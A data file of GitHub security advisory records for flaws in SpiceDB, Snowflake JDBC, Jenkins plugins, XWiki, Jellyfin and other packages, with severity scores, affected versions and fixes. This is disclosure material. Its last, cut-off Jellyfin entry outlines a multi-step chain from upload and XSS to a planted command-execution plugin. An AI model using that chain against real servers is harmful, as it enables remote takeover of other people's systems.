{'cwe_ids': ['CWE-208'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-18T13:05:08Z', 'nvd_published_at': '2023-04-15T20:16:00Z'}
|
1.4.0
|
GHSA-cjr9-mr35-7xh6
|
2023-04-14T21:35:43Z
|
2023-04-13T17:53:38Z
| null |
['CVE-2023-29193']
|
SpiceDB binding metrics port to untrusted networks and can leak command-line flags
|
### Background
The `spicedb serve` command contains a flag named `--grpc-preshared-key` which is used to protect the gRPC API from being accessed by unauthorized requests. The values of this flag are to be considered sensitive, secret data.
The `/debug/pprof/cmdline` endpoint served by the metrics service (defaulting running on port `9090`) reveals the command-line flags provided for debugging purposes. If a password is set via the `--grpc-preshared-key` then the key is revealed by this endpoint along with any other flags provided to the SpiceDB binary.
### Impact
All deployments abiding by the recommended best practices for production usage are **NOT affected**:
- Authzed's SpiceDB Serverless
- Authzed's SpiceDB Dedicated
- SpiceDB Operator
Users configuring SpiceDB via environment variables are **NOT affected**.
Users **MAY be affected** if they expose their metrics port to an untrusted network and are configuring `--grpc-preshared-key` via command-line flag.
### Workarounds
To workaround this issue you can do one of the following:
- Configure the preshared key via an environment variable (e.g. `SPICEDB_GRPC_PRESHARED_KEY=yoursecret spicedb serve`)
- Reconfigure the `--metrics-addr` flag to bind to a trusted network (e.g. `--metrics-addr=localhost:9090`)
- Disable the metrics service via the flag (e.g. `--metrics-enabled=false`)
- Adopt one of the recommended deployment models: [Authzed's managed services](https://authzed.com/pricing) or the [SpiceDB Operator](https://github.com/authzed/spicedb-operator)
### References
- [GitHub Security Advisory issued for SpiceDB](https://github.com/authzed/spicedb/security/advisories/GHSA-cjr9-mr35-7xh6)
- [Go issue #22085](https://github.com/golang/go/issues/22085) for documenting the risks of exposing pprof to the internet
- [Go issue #42834](https://github.com/golang/go/issues/42834) discusses preventing pprof registration to the default serve mux
- [semgrep rule go.lang.security.audit.net.pprof.pprof-debug-exposure](https://semgrep.dev/r?q=go.lang.security.audit.net.pprof) checks for a variation of this issue
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/authzed/spicedb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.19.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/authzed/spicedb/security/advisories/GHSA-cjr9-mr35-7xh6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29193'}, {'type': 'WEB', 'url': 'https://github.com/authzed/spicedb/commit/9bbd7d76b6eaba33fe0236014f9b175d21232999'}, {'type': 'PACKAGE', 'url': 'https://github.com/authzed/spicedb'}, {'type': 'WEB', 'url': 'https://github.com/authzed/spicedb/releases/tag/v1.19.1'}]
|
{'cwe_ids': ['CWE-209'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-13T17:53:38Z', 'nvd_published_at': '2023-04-14T20:15:00Z'}
|
1.4.0
|
GHSA-4g3j-c4wg-6j7x
|
2023-04-24T22:04:07Z
|
2023-04-14T18:28:58Z
| null |
['CVE-2023-30535']
|
Snowflake JDBC vulnerable to command injection via SSO URL authentication
|
Snowflake JDBC driver is vulnerable to command injection vulnerability via SSO URL authentication. The vulnerability was patched on March 17, 2023 as part of Snowflake JDBC driver Version 3.13.29. An attacker could set up a malicious, publicly accessible server which responds to the SSO URL with an attack payload. If the attacker then tricked a user into visiting the maliciously crafted connection URL, the user’s local machine would render the malicious payload, leading to a remote code execution.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'net.snowflake:snowflake-jdbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.13.29'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/snowflakedb/snowflake-jdbc/security/advisories/GHSA-4g3j-c4wg-6j7x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30535'}, {'type': 'WEB', 'url': 'https://community.snowflake.com/s/article/JDBC-Driver-Release-Notes'}, {'type': 'PACKAGE', 'url': 'https://github.com/snowflakedb/snowflake-jdbc'}]
|
{'cwe_ids': ['CWE-20', 'CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-14T18:28:58Z', 'nvd_published_at': '2023-04-14T20:15:00Z'}
|
1.4.0
|
GHSA-776f-qx25-q3cc
|
2023-06-21T18:11:16Z
|
2023-04-05T21:30:24Z
| null |
['CVE-2023-0842']
|
xml2js is vulnerable to prototype pollution
|
xml2js versions before 0.5.0 allows an external attacker to edit or add new properties to an object. This is possible because the application does not properly validate incoming JSON keys, thus allowing the `__proto__` property to be edited.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'xml2js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0842'}, {'type': 'WEB', 'url': 'https://github.com/Leonidas-from-XIV/node-xml2js/issues/663'}, {'type': 'WEB', 'url': 'https://github.com/Leonidas-from-XIV/node-xml2js/pull/603/commits/581b19a62d88f8a3c068b5a45f4542c2d6a495a5'}, {'type': 'WEB', 'url': 'https://fluidattacks.com/advisories/myers/'}, {'type': 'PACKAGE', 'url': 'https://github.com/Leonidas-from-XIV/node-xml2js'}]
|
{'cwe_ids': ['CWE-1321'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-07T21:00:54Z', 'nvd_published_at': '2023-04-05T20:15:00Z'}
|
1.4.0
|
GHSA-48g9-h7g5-8pw2
|
2023-04-04T17:37:11Z
|
2023-04-02T21:30:17Z
| null |
['CVE-2023-28676']
|
Jenkins Convert To Pipeline Plugin vulnerable to cross-site request forgery
|
Convert To Pipeline Plugin 1.0 and earlier does not require POST requests for the HTTP endpoint converting a Freestyle project to Pipeline, resulting in a cross-site request forgery (CSRF) vulnerability.
This vulnerability allows attackers to create a Pipeline based on a Freestyle project. Combined with [SECURITY-2966](https://www.jenkins.io/security/advisory/2023-03-21/#SECURITY-2966)/CVE-2023-28677, this can result in the execution of unsandboxed Pipeline scripts.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:convert-to-pipeline'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28676'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/octoperf-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-03-21/#SECURITY-2963'}]
|
{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-04T17:37:11Z', 'nvd_published_at': '2023-04-02T21:15:00Z'}
|
1.4.0
|
GHSA-3qj8-93xh-pwh2
|
2023-04-21T20:04:27Z
|
2023-04-21T18:30:24Z
| null |
['CVE-2023-30798']
|
Starlette allows an unauthenticated and remote attacker to specify any number of form fields or files
|
There MultipartParser usage in Encode's Starlette python framework before versions 0.25.0 allows an unauthenticated and remote attacker to specify any number of form fields or files which can cause excessive memory usage resulting in denial of service of the HTTP service.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'starlette'}, 'ecosystem_specific': {'affected_functions': ['starlette.requests.Request.form']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.25.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/encode/starlette/security/advisories/GHSA-74m5-2c7w-9w3x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30798'}, {'type': 'WEB', 'url': 'https://github.com/encode/starlette/commit/8c74c2c8dba7030154f8af18e016136bea1938fa'}, {'type': 'PACKAGE', 'url': 'https://github.com/encode/starlette'}, {'type': 'WEB', 'url': 'https://vulncheck.com/advisories/starlette-multipartparser-dos'}]
|
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-21T20:04:27Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-fw84-xgm8-9jmv
|
2023-05-04T21:44:58Z
|
2023-04-26T19:46:30Z
| null |
['CVE-2023-22729']
|
Open redirect vulnerability on CMSSecurity relogin screen
|
An attacker can display a link to a third party website on a login screen by convincing a legitimate content author to follow a specially crafted link.
Upgrade to `silverstripe/framework` 4.12.5 or above to remedy the vulnerability.
Reporter: Matthew Dekker
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'silverstripe/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.12.5'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-framework/security/advisories/GHSA-fw84-xgm8-9jmv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22729'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-framework/commit/1a5bb4cbece1721203977910b8ecd8b79c18dc77'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2023-22729.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/silverstripe/silverstripe-framework'}, {'type': 'WEB', 'url': 'https://www.silverstripe.org/download/security-releases/cve-2023-22729'}]
|
{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-26T19:46:30Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-2ccf-ffrj-m4qw
|
2023-04-24T15:56:27Z
|
2023-04-21T22:32:47Z
| null |
['CVE-2023-29020']
|
CSRF token fixation in fastify-passport
|
The [CSRF](https://owasp.org/www-community/attacks/csrf) protection enforced by the `@fastify/csrf-protection` library, when combined with `@fastify/passport`, can be bypassed by network and same-site attackers.
## Details
`fastify/csrf-protection` implements the [synchronizer token pattern](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#synchronizer-token-pattern) (using plugins `@fastify/session` and `@fastify/secure-session`) by storing a random value used for CSRF token generation in the `_csrf` attribute of a user's session.
The `@fastify/passport` library does not clear the session object upon authentication, preserving the `_csrf` attribute between pre-login and authenticated sessions. Consequently, CSRF tokens generated before authentication are still valid. Network and [same-site attackers](https://canitakeyoursubdomain.name/) can thus obtain a CSRF token for their pre-session, fixate that pre-session in the victim's browser via cookie tossing, and then perform a CSRF attack after the victim authenticates.
## Fix
As a solution, newer versions of `@fastify/passport` include the configuration options
* `clearSessionOnLogin (default: true)` and
* `clearSessionIgnoreFields (default: ['session'])`
to clear all the session attributes by default, preserving those explicitly defined in `clearSessionIgnoreFields`.
## Credits
* Pedro Adão (@pedromigueladao), [Instituto Superior Técnico, University of Lisbon](https://tecnico.ulisboa.pt/)
* Marco Squarcina (@lavish), [Security & Privacy Research Unit, TU Wien](https://secpriv.wien/)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': '@fastify/passport'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@fastify/passport'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.3.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/fastify/fastify-passport/security/advisories/GHSA-2ccf-ffrj-m4qw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29020'}, {'type': 'WEB', 'url': 'https://github.com/fastify/fastify-passport/commit/07c90feab9cba0dd4779e47cfb0717a7e2f01d3d'}, {'type': 'WEB', 'url': 'https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#synchronizer-token-pattern'}, {'type': 'PACKAGE', 'url': 'https://github.com/fastify/fastify-passport'}, {'type': 'WEB', 'url': 'https://owasp.org/www-community/attacks/csrf'}]
|
{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-21T22:32:47Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-735r-hv67-g38f
|
2023-04-14T21:34:56Z
|
2023-04-11T21:12:42Z
| null |
['CVE-2023-29194']
|
vitess allows users to create keyspaces that can deny access to already existing keyspaces
|
### Impact
Users can either intentionally or inadvertently create a keyspace containing `/` characters such that from that point on, anyone who tries to view keyspaces from VTAdmin will receive an error. Trying to list all the keyspaces using `vtctldclient GetKeyspaces` will also return an error.
Note that all other keyspaces can still be administered using the CLI (vtctldclient).
### Patches
v16.0.1 (corresponding to 0.16.1 on pkg.go.dev)
### Workarounds
Delete the offending keyspace using a CLI client (vtctldclient)
```
vtctldclient --server ... DeleteKeyspace a/b
```
Found during a security audit sponsored by the [CNCF](https://cncf.io) and facilitated by [OSTIF](https://ostif.org).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:L'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'vitess.io/vitess'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.16.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/vitessio/vitess/security/advisories/GHSA-735r-hv67-g38f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29194'}, {'type': 'WEB', 'url': 'https://github.com/vitessio/vitess/commit/adf10196760ad0b3991a7aa7a8580a544e6ddf88'}, {'type': 'PACKAGE', 'url': 'https://github.com/vitessio/vitess'}, {'type': 'WEB', 'url': 'https://github.com/vitessio/vitess/commits/v0.16.1/'}]
|
{'cwe_ids': ['CWE-20', 'CWE-703'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-11T21:12:42Z', 'nvd_published_at': '2023-04-14T19:15:00Z'}
|
1.4.0
|
GHSA-mg46-f9h5-g27x
|
2023-04-18T14:54:04Z
|
2023-04-13T12:30:35Z
| null |
['CVE-2022-45064']
|
Apache Sling Engine vulnerable to cross-site scripting (XSS) that can lead to privilege escalation
|
The SlingRequestDispatcher doesn't correctly implement the RequestDispatcher API resulting in a generic type of include-based cross-site scripting issues on the Apache Sling level. The vulnerability is exploitable by an attacker that is able to include a resource with specific content-type and control the include path (i.e. writing content). The impact of a successful attack is privilege escalation to administrative power.
Please update to Apache Sling Engine version 2.14.0 or newer and enable the "Check Content-Type overrides" configuration option.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.sling:org.apache.sling.engine'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.14.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-45064'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/sling-org-apache-sling-engine'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/hhp611hltby3whk03vx2mv7cmy3vs0ok'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/04/18/6'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-14T16:14:10Z', 'nvd_published_at': '2023-04-13T11:15:00Z'}
|
1.4.0
|
GHSA-gcmq-7652-x98j
|
2023-04-06T15:06:26Z
|
2023-04-05T18:30:18Z
| null |
['CVE-2023-1878']
|
thorsten/phpmyfaq vulnerable to stored cross-site scripting (XSS) via adminlog
|
thorsten/phpmyfaq prior to 3.1.12 is vulnerable to stored cross-site scripting (XSS) because it fails to sanitize user input in the adminlog. This has been fixed in 3.1.12.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.12'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1878'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/e018823f8e3bca103c11e5a98b0dd469e41ed417'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpMyFAQ'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/93f981a3-231d-460d-a239-bb960e8c2fdc'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-06T15:06:26Z', 'nvd_published_at': '2023-04-05T17:15:00Z'}
|
1.4.0
|
GHSA-mpvf-6h9g-2hq2
|
2023-05-01T16:41:14Z
|
2023-04-19T12:30:21Z
| null |
['CVE-2023-29921']
|
PowerJob Incorrect Access Control vulnerability
|
PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create app interface.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'tech.powerjob:powerjob'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.3.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29921'}, {'type': 'WEB', 'url': 'https://github.com/PowerJob/PowerJob/issues/586'}, {'type': 'PACKAGE', 'url': 'https://github.com/PowerJob/PowerJob'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-21T20:16:42Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-5p84-mmh9-pxgr
|
2023-04-07T22:35:11Z
|
2023-04-04T15:30:27Z
| null |
['CVE-2020-19698']
|
Pandao Editor.md vulnerable to cross-site scripting (XSS) in editor parameter
|
Cross-site Scripting vulnerability found in Pandao Editor.md v.1.5.0 allows a remote attacker to execute arbitrary code via a crafted script to the `editor` parameter.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'editor.md'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.5.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-19698'}, {'type': 'WEB', 'url': 'https://github.com/pandao/editor.md/issues/700'}, {'type': 'WEB', 'url': 'https://github.com/pandao/editor.md/pull/860'}, {'type': 'PACKAGE', 'url': 'https://github.com/pandao/editor.md'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-04T21:24:11Z', 'nvd_published_at': '2023-04-04T15:15:00Z'}
|
1.4.0
|
GHSA-rrhf-32rq-f28h
|
2023-04-14T20:24:31Z
|
2023-04-10T09:30:15Z
| null |
['CVE-2023-29216']
|
Apache Linkis DatasourceManager module has deserialization vulnerability
|
In Apache Linkis <=1.3.1, because the parameters are not effectively filtered, the attacker can use the MySQL data source and malicious parameters to configure a new data source to trigger a deserialization vulnerability, eventually leading to remote code execution. Users should upgrade their version of Linkis to version 1.3.2.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.linkis:linkis-datasource'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29216'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/linkis'}, {'type': 'WEB', 'url': 'https://linkis.apache.org/download/release-notes-1.3.2/'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/18vv0m32oy51nzk8tbz13qdl5569y55l'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/04/10/5'}]
|
{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-10T16:58:23Z', 'nvd_published_at': '2023-04-10T08:15:00Z'}
|
1.4.0
|
GHSA-hhjm-mpmf-cxg9
|
2023-04-06T16:54:42Z
|
2023-04-05T18:30:18Z
| null |
['CVE-2023-1881']
|
Microweber vulnerable to stored cross-site scripting (XSS) via X-Forwarded-For header
|
microweber/microweber prior to 1.3.3 is vulnerable to stored cross-site scripting (XSS) via the `X-Forwarded-For` header. This was fixed in version 1.3.3.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'microweber/microweber'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1881'}, {'type': 'WEB', 'url': 'https://github.com/microweber/microweber/commit/8d039de2d615956f6df8df0bb1045ff3be88f183'}, {'type': 'PACKAGE', 'url': 'https://github.com/microweber/microweber'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/d5ebc2bd-8638-41c4-bf72-7c906c601344'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-06T16:54:42Z', 'nvd_published_at': '2023-04-05T17:15:00Z'}
|
1.4.0
|
GHSA-mjg3-2v66-p34j
|
2023-04-04T17:34:39Z
|
2023-04-02T21:30:17Z
| null |
['CVE-2023-28673']
|
Jenkins OctoPerf Load Testing Plugin missing permission check allows for ID enumeration
|
OctoPerf Load Testing Plugin Plugin 4.5.2 and earlier does not perform a permission check in an HTTP endpoint.
This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.
An enumeration of credentials IDs in OctoPerf Load Testing Plugin Plugin 4.5.3 requires the appropriate permissions.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkinsci.plugins:octoperf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.5.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.5.2'}}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28673'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/octoperf-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-03-21/#SECURITY-3067%20(3)'}]
|
{'cwe_ids': ['CWE-284', 'CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-04T17:34:39Z', 'nvd_published_at': '2023-04-02T21:15:00Z'}
|
1.4.0
|
GHSA-7m8r-gmc3-3p4v
|
2023-04-24T18:34:26Z
|
2023-04-15T15:30:14Z
| null |
['CVE-2023-2103']
|
alextselegidis/easyappointments vulnerable to Stored Cross-site Scripting
|
alextselegidis/easyappointments is vulnerable to stored cross-site scripting in versions 1.4.3 and prior. A patch is available at commit 46a865300e94c7031cc0e315d95d3e3e56768498 and anticipated to be part of version 1.5.0.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'alextselegidis/easyappointments'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.4.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2103'}, {'type': 'WEB', 'url': 'https://github.com/alextselegidis/easyappointments/commit/46a865300e94c7031cc0e315d95d3e3e56768498'}, {'type': 'PACKAGE', 'url': 'https://github.com/alextselegidis/easyappointments'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1df09505-9923-43b9-82ef-15d94bc3f9dc'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-24T18:34:26Z', 'nvd_published_at': '2023-04-15T14:15:00Z'}
|
1.4.0
|
GHSA-p67q-h88v-5jgr
|
2023-04-28T19:53:41Z
|
2023-04-20T22:06:19Z
| null |
['CVE-2023-29521']
|
XWiki Platform vulnerable to code injection from account/view through VFS Tree macro
|
### Impact
Any user with view rights can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of `Macro.VFSTreeMacro`. This page is not installed by default.
See https://jira.xwiki.org/browse/XWIKI-20260 for the reproduction steps.
### Patches
The vulnerability has been patched in XWiki 15.0-rc-1, 14.10.2, 14.4.8, 13.10.11.
### Workarounds
The issue can be fixed by applying this [patch](https://github.com/xwiki/xwiki-platform/commit/fad02328f5ec7ab7fe5b932ffb5bc5c1ba7a5b12) on `Macro.VFSTreeMacro`.
### References
- https://jira.xwiki.org/browse/XWIKI-20260
- https://github.com/xwiki/xwiki-platform/commit/fad02328f5ec7ab7fe5b932ffb5bc5c1ba7a5b12
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-vfs-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.4-milestone-2'}, {'fixed': '13.10.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-vfs-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0-rc-1'}, {'fixed': '14.4.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-vfs-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10.2'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-p67q-h88v-5jgr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29521'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/fad02328f5ec7ab7fe5b932ffb5bc5c1ba7a5b12'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20260'}]
|
{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-20T22:06:19Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-9p5f-5x8v-x65m
|
2023-05-09T16:24:16Z
|
2023-04-24T22:39:03Z
| null |
['CVE-2023-30626']
|
Directory traversal + file write causing arbitrary code execution
|
### Impact
Frederic Linn (@FredericLinn) has reported a series of vulnerabilities that can result in directory traversal, file write, and potential remote code execution on Jellyfin instances. The general process involves chaining several exploits including a stored XSS vulnerability and can be used by an unprivileged user.
The general process is (using the example of setting an intro video as the payload):
* Create a session as a low-priviledged user with a crafted authorization header
* Upload an executable that contains a malicious plugin inline via /ClientLog/Document
* (Admin hovers over our device in dashboard -> XSS payload gets triggered)
* XSS Payload tries to set encoder path to our uploaded "log" file via /System/MediaEncoder/Path
* The request fails, but in the process our executable actually runs (I guess for verifying if the path points to a valid ffmpeg version)
* The executable will create a plugin folder and place the inlined plugin DLL inside it
* The XSS payload shuts down the server via /System/Shutdown (separate CVE in `jellyfin-web`)
* After (manually) starting the server, the plugin gets loaded and will:
* write a new video into the Jellyfin temp folder and register it
* register this video as the new intro
* and finally provide a malicious endpoint that simply executes system commands and sends back the results
The ability to write arbitrary content to log files was added in #5918 to allow flexibility to client logging.
The following two sections detail Frederic's exact determinations regarding the two vulnerabilities.
#### Directory traversal and file write
